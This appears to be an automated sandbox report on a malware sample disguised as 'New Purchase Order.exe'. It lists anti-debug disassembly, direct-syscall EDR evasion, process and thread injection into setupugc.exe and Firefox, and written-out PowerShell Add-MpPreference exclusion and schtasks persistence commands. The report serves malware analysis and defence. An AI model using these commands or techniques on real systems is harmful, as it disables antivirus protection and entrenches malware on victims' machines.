            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181096E mov eax, dword ptr fs:[00000030h]9_2_0181096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181096E mov edx, dword ptr fs:[00000030h]9_2_0181096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0181096E mov eax, dword ptr fs:[00000030h]9_2_0181096E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C97C mov eax, dword ptr fs:[00000030h]9_2_0185C97C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01874978 mov eax, dword ptr fs:[00000030h]9_2_01874978
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01874978 mov eax, dword ptr fs:[00000030h]9_2_01874978
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C89D mov eax, dword ptr fs:[00000030h]9_2_0185C89D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4859 mov eax, dword ptr fs:[00000030h]9_2_017D4859
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4859 mov eax, dword ptr fs:[00000030h]9_2_017D4859
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E2840 mov ecx, dword ptr fs:[00000030h]9_2_017E2840
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov ecx, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F2835 mov eax, dword ptr fs:[00000030h]9_2_017F2835
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A08C0 mov eax, dword ptr fs:[00000030h]9_2_018A08C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189A8E4 mov eax, dword ptr fs:[00000030h]9_2_0189A8E4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C8F9 mov eax, dword ptr fs:[00000030h]9_2_0180C8F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C8F9 mov eax, dword ptr fs:[00000030h]9_2_0180C8F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C810 mov eax, dword ptr fs:[00000030h]9_2_0185C810
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A830 mov eax, dword ptr fs:[00000030h]9_2_0180A830
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187483A mov eax, dword ptr fs:[00000030h]9_2_0187483A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187483A mov eax, dword ptr fs:[00000030h]9_2_0187483A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE8C0 mov eax, dword ptr fs:[00000030h]9_2_017FE8C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01800854 mov eax, dword ptr fs:[00000030h]9_2_01800854
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01866870 mov eax, dword ptr fs:[00000030h]9_2_01866870
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01866870 mov eax, dword ptr fs:[00000030h]9_2_01866870
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185E872 mov eax, dword ptr fs:[00000030h]9_2_0185E872
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185E872 mov eax, dword ptr fs:[00000030h]9_2_0185E872
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0887 mov eax, dword ptr fs:[00000030h]9_2_017D0887
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CCB7E mov eax, dword ptr fs:[00000030h]9_2_017CCB7E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C8B50 mov eax, dword ptr fs:[00000030h]9_2_017C8B50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01884BB0 mov eax, dword ptr fs:[00000030h]9_2_01884BB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01884BB0 mov eax, dword ptr fs:[00000030h]9_2_01884BB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187EBD0 mov eax, dword ptr fs:[00000030h]9_2_0187EBD0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FEB20 mov eax, dword ptr fs:[00000030h]9_2_017FEB20
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FEB20 mov eax, dword ptr fs:[00000030h]9_2_017FEB20
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185CBF0 mov eax, dword ptr fs:[00000030h]9_2_0185CBF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FEBFC mov eax, dword ptr fs:[00000030h]9_2_017FEBFC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4B00 mov eax, dword ptr fs:[00000030h]9_2_018A4B00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D8BF0 mov eax, dword ptr fs:[00000030h]9_2_017D8BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D8BF0 mov eax, dword ptr fs:[00000030h]9_2_017D8BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D8BF0 mov eax, dword ptr fs:[00000030h]9_2_017D8BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]9_2_0184EB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]9_2_0184EB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]9_2_0184EB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]9_2_0184EB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]9_2_0184EB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]9_2_0184EB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]9_2_0184EB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]9_2_0184EB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184EB1D mov eax, dword ptr fs:[00000030h]9_2_0184EB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01898B28 mov eax, dword ptr fs:[00000030h]9_2_01898B28
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01898B28 mov eax, dword ptr fs:[00000030h]9_2_01898B28
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0BCD mov eax, dword ptr fs:[00000030h]9_2_017D0BCD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0BCD mov eax, dword ptr fs:[00000030h]9_2_017D0BCD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0BCD mov eax, dword ptr fs:[00000030h]9_2_017D0BCD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F0BCB mov eax, dword ptr fs:[00000030h]9_2_017F0BCB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F0BCB mov eax, dword ptr fs:[00000030h]9_2_017F0BCB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F0BCB mov eax, dword ptr fs:[00000030h]9_2_017F0BCB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0BBE mov eax, dword ptr fs:[00000030h]9_2_017E0BBE
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0BBE mov eax, dword ptr fs:[00000030h]9_2_017E0BBE
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01884B4B mov eax, dword ptr fs:[00000030h]9_2_01884B4B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01884B4B mov eax, dword ptr fs:[00000030h]9_2_01884B4B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01878B42 mov eax, dword ptr fs:[00000030h]9_2_01878B42
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01866B40 mov eax, dword ptr fs:[00000030h]9_2_01866B40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01866B40 mov eax, dword ptr fs:[00000030h]9_2_01866B40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189AB40 mov eax, dword ptr fs:[00000030h]9_2_0189AB40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187EB50 mov eax, dword ptr fs:[00000030h]9_2_0187EB50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A2B57 mov eax, dword ptr fs:[00000030h]9_2_018A2B57
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A2B57 mov eax, dword ptr fs:[00000030h]9_2_018A2B57
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A2B57 mov eax, dword ptr fs:[00000030h]9_2_018A2B57
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A2B57 mov eax, dword ptr fs:[00000030h]9_2_018A2B57
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4A80 mov eax, dword ptr fs:[00000030h]9_2_018A4A80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01808A90 mov edx, dword ptr fs:[00000030h]9_2_01808A90
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0A5B mov eax, dword ptr fs:[00000030h]9_2_017E0A5B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0A5B mov eax, dword ptr fs:[00000030h]9_2_017E0A5B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01826AA4 mov eax, dword ptr fs:[00000030h]9_2_01826AA4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]9_2_017D6A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]9_2_017D6A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]9_2_017D6A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]9_2_017D6A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]9_2_017D6A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]9_2_017D6A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D6A50 mov eax, dword ptr fs:[00000030h]9_2_017D6A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F4A35 mov eax, dword ptr fs:[00000030h]9_2_017F4A35
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F4A35 mov eax, dword ptr fs:[00000030h]9_2_017F4A35
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01826ACC mov eax, dword ptr fs:[00000030h]9_2_01826ACC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01826ACC mov eax, dword ptr fs:[00000030h]9_2_01826ACC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01826ACC mov eax, dword ptr fs:[00000030h]9_2_01826ACC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01804AD0 mov eax, dword ptr fs:[00000030h]9_2_01804AD0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01804AD0 mov eax, dword ptr fs:[00000030h]9_2_01804AD0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FEA2E mov eax, dword ptr fs:[00000030h]9_2_017FEA2E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180AAEE mov eax, dword ptr fs:[00000030h]9_2_0180AAEE
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180AAEE mov eax, dword ptr fs:[00000030h]9_2_0180AAEE
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185CA11 mov eax, dword ptr fs:[00000030h]9_2_0185CA11
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180CA24 mov eax, dword ptr fs:[00000030h]9_2_0180CA24
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0AD0 mov eax, dword ptr fs:[00000030h]9_2_017D0AD0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180CA38 mov eax, dword ptr fs:[00000030h]9_2_0180CA38
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D8AA0 mov eax, dword ptr fs:[00000030h]9_2_017D8AA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D8AA0 mov eax, dword ptr fs:[00000030h]9_2_017D8AA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187EA60 mov eax, dword ptr fs:[00000030h]9_2_0187EA60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180CA6F mov eax, dword ptr fs:[00000030h]9_2_0180CA6F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180CA6F mov eax, dword ptr fs:[00000030h]9_2_0180CA6F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180CA6F mov eax, dword ptr fs:[00000030h]9_2_0180CA6F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184CA72 mov eax, dword ptr fs:[00000030h]9_2_0184CA72
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184CA72 mov eax, dword ptr fs:[00000030h]9_2_0184CA72
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtTerminateThread: Direct from: 0x77382FCC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtAllocateVirtualMemory: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeNtProtectVirtualMemory: Direct from: 0x77377B2E
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory written: C:\Users\user\Desktop\New Purchase Order.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\setupugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\setupugc.exeThread register set: target process: 1584Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\setupugc.exeThread APC queued: target process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeProcess created: C:\Users\user\AppData\Roaming\hbaiQWstL.exe "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"Jump to behavior
